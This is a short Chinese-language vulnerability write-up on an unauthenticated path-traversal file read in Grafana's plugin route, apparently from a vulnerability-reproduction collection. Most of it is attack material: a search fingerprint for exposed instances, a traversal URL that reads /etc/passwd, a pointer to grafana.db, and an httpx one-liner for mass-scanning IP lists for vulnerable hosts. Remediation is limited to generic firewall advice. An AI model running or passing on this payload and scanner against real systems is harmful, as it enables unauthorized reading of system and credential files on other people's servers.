app="Grafana"

0x01 漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

0x02 漏洞复现

Example: /var/lib/grafana/grafana.db

Untitled

Untitled

https://xx.xx.xx.xx/public/plugins/grafana-clock-panel/../../../../../../etc/passwd

Untitled

其他插件

Untitled

批量

cat ip1.txt | xargs -I {}  echo {} | httpx -status-code -path "/public/plugins/logs/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'

0x03 漏洞修复建议

目前没有详细的解决方案提供,请关注厂商主页更新:https://grafana.com/

临时修复建议:

1、通过防火墙等安全设备设置访问策略,设置白名单访问。

2、如非必要,禁止公网访问该系统。

参考链接